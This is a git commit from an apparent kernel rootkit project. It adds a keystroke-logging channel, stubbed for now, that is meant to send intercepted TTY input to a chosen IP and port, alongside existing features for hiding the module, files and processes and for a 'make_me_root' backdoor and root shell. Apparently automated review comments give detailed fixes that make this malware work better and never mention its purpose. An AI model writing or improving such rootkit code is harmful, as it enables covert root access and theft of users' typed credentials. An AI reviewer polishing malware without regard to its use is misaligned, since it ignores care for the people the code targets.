commit 690697be6d8195bff6893781c68c73b43b62fd42
parent 47defaced1d5f0c9a42c470cc36cab906b20a710
Author: deurzen <m.deurzen@tum.de>
Date: Fri, 11 Dec 2020 23:12:04 +0100
initial input logging code
Diffstat:
9 files changed, 95 insertions(+), 20 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -1,3 +1,4 @@
+#include <linux/string.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/uaccess.h>
@@ -11,6 +12,7 @@
#include "openhide.h"
#include "backdoor.h"
#include "pidhide.h"
+#include "inputlog.h"
#include "ioctl.h"
#include "rootkit.h"
@@ -30,6 +32,7 @@ report_channels(void)
DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID", G7_PIDHIDE);
DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
+ DEBUG_NOTICE("%-24s %#10lx\n", "LOGGING", G7_LOGGING);
DEBUG_NOTICE("-----------------------------------\n");
}
@@ -44,6 +47,7 @@ detect_channel(unsigned cmd)
case G7_PIDHIDE: return (channel_t){ "HIDEPID", handle_pidhide };
case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
+ case G7_LOGGING: return (channel_t){ "LOGGING", handle_logging };
}
return (channel_t){ "unknown", NULL };
@@ -227,3 +231,33 @@ handle_togglebd(unsigned long arg)
return 0;
}
+
+int
+handle_logging(unsigned long arg)
+{
+ char buf[BUFLEN];
+ const char *sarg = (const char *)arg;
+
+ if (!sarg) {
+ unlog_input();
+ rootkit.logging_input = 0;
+
+ DEBUG_NOTICE("[g7] inputlogging off\n");
+ } else if (!copy_from_user(buf, sarg, BUFLEN) && strstr(buf, ":")) {
+ if (!rootkit.logging_input) {
+ DEBUG_NOTICE("[g7] inputlogging on\n");
+ } else
+ unlog_input();
+
+ char *port = buf;
+ char *ip = strsep(&port, ":");
+
+ log_input(ip, port);
+ rootkit.logging_input = 1;
+
+ DEBUG_INFO("[g7] forwarding stdin to socket %s:%s\n", ip, port);
+ } else
+ return -ENOTTY;
+
+ return 0;
+}
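Review bot: `copy_from_user(buf, sarg, BUFLEN)` in the `else if` never NUL-terminates `buf`, yet `strstr`, `strsep` and the `DEBUG_INFO` format all treat it as a C string, so a user string that fills the buffer makes those calls read past the end of the stack array; it also fails for any mapping shorter than BUFLEN bytes, turning a valid short `ip:port` argument into -ENOTTY. Use the string-aware copy from `<linux/uaccess.h>` and pin the terminator: `} else if (strncpy_from_user(buf, sarg, BUFLEN - 1) >= 0) {` followed by `buf[BUFLEN - 1] = '\0';` and `if (!strchr(buf, ':')) return -ENOTTY;` before the `strsep` split. `rootkit.logging_input` is declared `bool` in rootkit.h in this same commit, so `true`/`false` would match the other flags better than `0`/`1`, and the declarations of `port` and `ip` after statements may trip -Wdeclaration-after-statement if the module is built with the kernel's default flags.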
diff --git a/src/channel.h b/src/channel.h
@@ -17,5 +17,6 @@ int handle_openhide(unsigned long);
int handle_pidhide(unsigned long);
int handle_backdoor(unsigned long);
int handle_togglebd(unsigned long);
+int handle_logging(unsigned long);
#endif//_GROUP7_CHANNEL_H
diff --git a/src/g7.c b/src/g7.c
@@ -44,6 +44,7 @@ rootkit_t rootkit = {
.hiding_files = true,
.hiding_open = true,
.hiding_pids = true,
+ .logging_input = true,
.backdoor = BD_TTY,
};
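Review bot: `.logging_input = true` records an active log target at load time, but nothing calls `log_input()` during init and `handle_logging` (channel.c in this commit) uses this flag to choose between printing "inputlogging on" and tearing down a previous target, so the first `inputlogging` command calls `unlog_input()` with nothing to undo and the "on" notice is never printed. Initialise the flag to the real state: `.logging_input = false,`. The struct literal this initialiser belongs to starts outside the hunk.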
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -0,0 +1,13 @@
+#include "inputlog.h"
+
+void
+log_input(const char *ip, const char *port)
+{
+
+}
+
+void
+unlog_input(void)
+{
+
+}
diff --git a/src/inputlog.h b/src/inputlog.h
@@ -0,0 +1,7 @@
+#ifndef _GROUP7_INPUTLOG_H
+#define _GROUP7_INPUTLOG_H
+
+void log_input(const char *, const char *);
+void unlog_input(void);
+
+#endif//_GROUP7_INPUTLOG_H
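Review bot: The new prototypes carry no contract for their arguments: in `handle_logging` (channel.c in this commit) `ip` and `port` point into a stack buffer that is gone as soon as the ioctl handler returns, so an implementation that retains either must copy it, and `unlog_input()` is called on the "off" path without checking whether anything was ever started, so it must be a safe no-op in that case. Document both on the declarations, e.g. `/* ip and port are valid only for the duration of the call; copy if retained. */` above `log_input` and `/* Safe to call when logging was never started. */` above `unlog_input`.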
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -11,5 +11,6 @@
#define G7_PIDHIDE _IOR(G7_MAGIC_NUMBER, 0x4, char *)
#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x5, char *)
#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x6, char *)
+#define G7_LOGGING _IOR(G7_MAGIC_NUMBER, 0x7, char *)
#endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -73,6 +73,25 @@ parse_input(int argc, char **argv)
}
}
+ if (ARGVCMP(1, "hidepid")) {
+ ASSERT_ARGC(3, "hidepid <add | rm> <PID>");
+
+ long arg;
+ if ((arg = strtol(argv[3], NULL, 10))) {
+ if (ARGVCMP(2, "add"))
+ return (cmd_t){ handle_pidhide, (void *)(arg) };
+
+ if (ARGVCMP(2, "rm"))
+ return (cmd_t){ handle_pidhide, (void *)((-1) * (arg)) };
+ } else {
+ fprintf(stderr, "%s: invalid pid `%s`\n", progname, argv[3]);
+ exit(1);
+ }
+ }
+
+ if (ARGVCMP(1, "hidepid-off"))
+ return (cmd_t){ handle_pidhide, (void *)0 };
+
if (ARGVCMP(1, "backdoor")) {
ASSERT_ARGC(2, "backdoor <execve_command>");
return (cmd_t){ handle_backdoor, (void *)argv[2] };
@@ -94,25 +113,15 @@ parse_input(int argc, char **argv)
if (ARGVCMP(1, "backdoor-off"))
return (cmd_t){ handle_togglebd, (void *)0 };
- if (ARGVCMP(1, "hidepid")) {
- ASSERT_ARGC(3, "hidepid <add | rm> <PID>");
+ if (ARGVCMP(1, "inputlogging")) {
+ ASSERT_ARGC(3, "inputlogging <ip> <port>");
- long arg;
- if ((arg = strtol(argv[3], NULL, 10))) {
- if (ARGVCMP(2, "add"))
- return (cmd_t){ handle_pidhide, (void *)(arg) };
+ char *socket = (char *)malloc(BUFLEN);
+ snprintf(socket, BUFLEN, "%s:%s", argv[2], argv[3]);
- if (ARGVCMP(2, "rm"))
- return (cmd_t){ handle_pidhide, (void *)((-1) * (arg)) };
- } else {
- fprintf(stderr, "%s: invalid pid `%s`\n", progname, argv[3]);
- exit(1);
- }
+ return (cmd_t){ handle_logging, (void *)socket };
}
- if (ARGVCMP(1, "hidepid-off"))
- return (cmd_t){ handle_pidhide, (void *)0 };
-
help();
exit(1);
}
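Review bot: The new `inputlogging` branch passes the result of `malloc(BUFLEN)` straight to `snprintf` without checking for NULL, the cast on `malloc` is unnecessary in C, the local named `socket` shadows the POSIX `socket()` function if `<sys/socket.h>` is ever included here, and the `snprintf` return value is ignored, so an over-long `ip`/`port` pair is silently truncated before it reaches the kernel. Check the allocation and the formatted length, and give the buffer a name that does not collide with a libc function; the relocated `hidepid` block in the earlier hunk is unchanged and needs nothing. `parse_input` continues outside the hunk.
```c
if (ARGVCMP(1, "inputlogging")) {
    ASSERT_ARGC(3, "inputlogging <ip> <port>");

    char *target = malloc(BUFLEN);
    if (!target) {
        perror(progname);
        exit(1);
    }
    int n = snprintf(target, BUFLEN, "%s:%s", argv[2], argv[3]);
    if (n < 0 || (size_t)n >= BUFLEN) {
        fprintf(stderr, "%s: address too long `%s:%s`\n", progname, argv[2], argv[3]);
        exit(1);
    }
    return (cmd_t){ handle_logging, (void *)target };
}
```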
@@ -142,6 +151,12 @@ handle_openhide(void *arg)
}
int
+handle_pidhide(void *arg)
+{
+ return issue_ioctl(G7_PIDHIDE, (const char *)arg);
+}
+
+int
handle_backdoor(void *arg)
{
return issue_ioctl(G7_BACKDOOR, (const char *)arg);
@@ -173,9 +188,9 @@ handle_togglebd(void *arg)
}
int
-handle_pidhide(void *arg)
+handle_logging(void *arg)
{
- return issue_ioctl(G7_PIDHIDE, (const char *)arg);
+ return issue_ioctl(G7_LOGGING, (const char *)arg);
}
int
@@ -206,9 +221,10 @@ help()
printf("%-38s %s\n", "unload", "gracefully unload the rootkit module");
printf("%-38s %s\n", "modhide <on | off>", "{,un}hide rootkit module");
printf("%-38s %s\n", "filehide [open] <toggle | on | off>", "{,un}hide [open] files");
+ printf("%-38s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process");
printf("%-38s %s\n", "backdoor <execve_command>", "exec a command as root");
printf("%-38s %s\n", "shell", "obtain a shell as root");
- printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or tty (1)");
+ printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");
printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
- printf("%-38s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process");
+ printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>");
}
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -24,9 +24,10 @@ int handle_ping(void *);
int handle_modhide(void *);
int handle_filehide(void *);
int handle_openhide(void *);
+int handle_pidhide(void *);
int handle_backdoor(void *);
int handle_shellbd(void *);
int handle_togglebd(void *);
-int handle_pidhide(void *);
+int handle_logging(void *);
#endif//_GROUP7_RKCTL_H
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -15,6 +15,7 @@ typedef struct {
bool hiding_files;
bool hiding_pids;
bool hiding_open;
+ bool logging_input;
bd_state_t backdoor;
} rootkit_t;